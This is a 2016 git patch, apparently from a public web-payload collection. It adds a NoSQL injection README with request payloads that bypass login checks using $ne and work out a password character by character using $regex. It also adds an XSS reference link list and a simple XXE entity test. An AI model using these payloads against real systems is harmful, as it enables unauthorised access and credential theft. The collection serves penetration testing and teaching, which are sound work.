From d0e164b6b1a080d924ff208b7aa515c3424d0206 Mon Sep 17 00:00:00 2001
From: swisskyrepo <maxropelewski@gmail.com>
Date: Sun, 30 Oct 2016 18:53:32 +0700
Subject: [PATCH] NOSQL injection added + updates XSS/XXE

---
 NoSQL injection/README.md | 29 +++++++++++++++++++++++++++++
 XSS injection/README.md   |  6 +++++-
 XXE files/README.md       | 10 ++++++++++
 3 files changed, 44 insertions(+), 1 deletion(-)
 create mode 100644 NoSQL injection/README.md

diff --git a/NoSQL injection/README.md b/NoSQL injection/README.md
new file mode 100644
index 0000000..1b47522
--- /dev/null
+++ b/NoSQL injection/README.md	
@@ -0,0 +1,29 @@
+# NoSQL injection
+NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.
+
+## Exploit
+
+Basic authentication bypass using not equal ($ne)
+```
+username[$ne]=toto&password[$ne]=toto
+```
+
+Extract length information
+```
+username[$ne]=toto&password[$regex]=.{1}
+username[$ne]=toto&password[$regex]=.{3}
+```
+
+Extract data information
+```
+username[$ne]=toto&password[$regex]=m.{2}
+username[$ne]=toto&password[$regex]=md.{1}
+username[$ne]=toto&password[$regex]=mdp
+
+username[$ne]=toto&password[$regex]=m.*
+username[$ne]=toto&password[$regex]=md.*
+```
+
+## Thanks to
+* https://www.dailysecurity.fr/nosql-injections-classique-blind/
+* https://www.owasp.org/index.php/Testing_for_NoSQL_injection
\ No newline at end of file
diff --git a/XSS injection/README.md b/XSS injection/README.md
index 8dc0918..4bbb12e 100644
--- a/XSS injection/README.md	
+++ b/XSS injection/README.md	
@@ -242,4 +242,8 @@ Use JSFuck to encode the payload (alert())
 
 ## Thanks to
 * https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
-* tbm
\ No newline at end of file
+* tbm
+* http://infinite8security.blogspot.com/2016/02/welcome-readers-as-i-promised-this-post.html
+* http://www.thespanner.co.uk/2014/03/21/rpo/
+* http://blog.innerht.ml/rpo-gadgets/
+* http://support.detectify.com/customer/portal/articles/2088351-relative-path-overwrite
\ No newline at end of file
diff --git a/XXE files/README.md b/XXE files/README.md
index da29ba9..1e1cd2b 100644
--- a/XXE files/README.md	
+++ b/XXE files/README.md	
@@ -3,6 +3,16 @@ An XML External Entity attack is a type of attack against an application that pa
 
 ## Exploit
 
+Basic Test
+```
+<!--?xml version="1.0" ?-->
+<!DOCTYPE replace [<!ENTITY example "Doe"> ]>
+ <userInfo>
+  <firstName>John</firstName>
+  <lastName>&example;</lastName>
+ </userInfo>
+```
+
 Classic XXE
 ```
 <?xml version="1.0"?>